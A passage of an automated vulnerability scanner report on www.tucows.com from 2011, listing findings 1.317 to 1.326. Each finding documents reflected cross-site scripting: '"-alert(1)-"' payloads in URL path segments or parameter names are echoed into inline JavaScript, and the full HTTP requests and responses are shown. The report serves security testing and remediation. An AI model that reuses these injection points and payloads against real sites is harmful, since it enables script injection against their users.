Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassetsc3c15"-alert(1)-"6e3e5a56f01/javascript:void(null) HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassetsc3c15"-alert(1)-"6e3e5a56f01/javascript:void(null)";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.317. http://www.tucows.com/images/newassets/javascript:void(null) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1045a"-alert(1)-"0b7ffb9ae62 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/javascript:void(null)1045a"-alert(1)-"0b7ffb9ae62 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/javascript:void(null)1045a"-alert(1)-"0b7ffb9ae62";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.318. http://www.tucows.com/images/newassets/javascript:void(null) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55e7b"-alert(1)-"e4c6b9e0aae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/javascript:void(null)?55e7b"-alert(1)-"e4c6b9e0aae=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/javascript:void(null)?55e7b"-alert(1)-"e4c6b9e0aae=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.319. http://www.tucows.com/images/newassets/lostpass.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8030"-alert(1)-"d2a10cd4b2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesb8030"-alert(1)-"d2a10cd4b2f/newassets/lostpass.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagesb8030"-alert(1)-"d2a10cd4b2f/newassets/lostpass.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.320. http://www.tucows.com/images/newassets/lostpass.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2408f"-alert(1)-"745fc17afdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets2408f"-alert(1)-"745fc17afdb/lostpass.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets2408f"-alert(1)-"745fc17afdb/lostpass.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.321. http://www.tucows.com/images/newassets/lostpass.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f369"-alert(1)-"1c6dab942a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/lostpass.html3f369"-alert(1)-"1c6dab942a HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/lostpass.html3f369"-alert(1)-"1c6dab942a";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.322. http://www.tucows.com/images/newassets/lostpass.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10cdc"-alert(1)-"bef9c960c47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/lostpass.html?10cdc"-alert(1)-"bef9c960c47=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/lostpass.html?10cdc"-alert(1)-"bef9c960c47=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.323. http://www.tucows.com/images/newassets/privacy.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0054"-alert(1)-"f4d5b36deb7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesa0054"-alert(1)-"f4d5b36deb7/newassets/privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagesa0054"-alert(1)-"f4d5b36deb7/newassets/privacy.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.324. http://www.tucows.com/images/newassets/privacy.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a40ac"-alert(1)-"9549b461301 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassetsa40ac"-alert(1)-"9549b461301/privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassetsa40ac"-alert(1)-"9549b461301/privacy.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.325. http://www.tucows.com/images/newassets/privacy.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feb32"-alert(1)-"50d4670b506 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/privacy.htmlfeb32"-alert(1)-"50d4670b506 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/privacy.htmlfeb32"-alert(1)-"50d4670b506";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.326. http://www.tucows.com/images/newassets/privacy.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1a3a"-alert(1)-"4dfa8e6d415 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/privacy.html?b1a3a"-alert(1)-"4dfa8e6d415=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/privacy.html?b1a3a"-alert(1)-"4dfa8e6d415=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

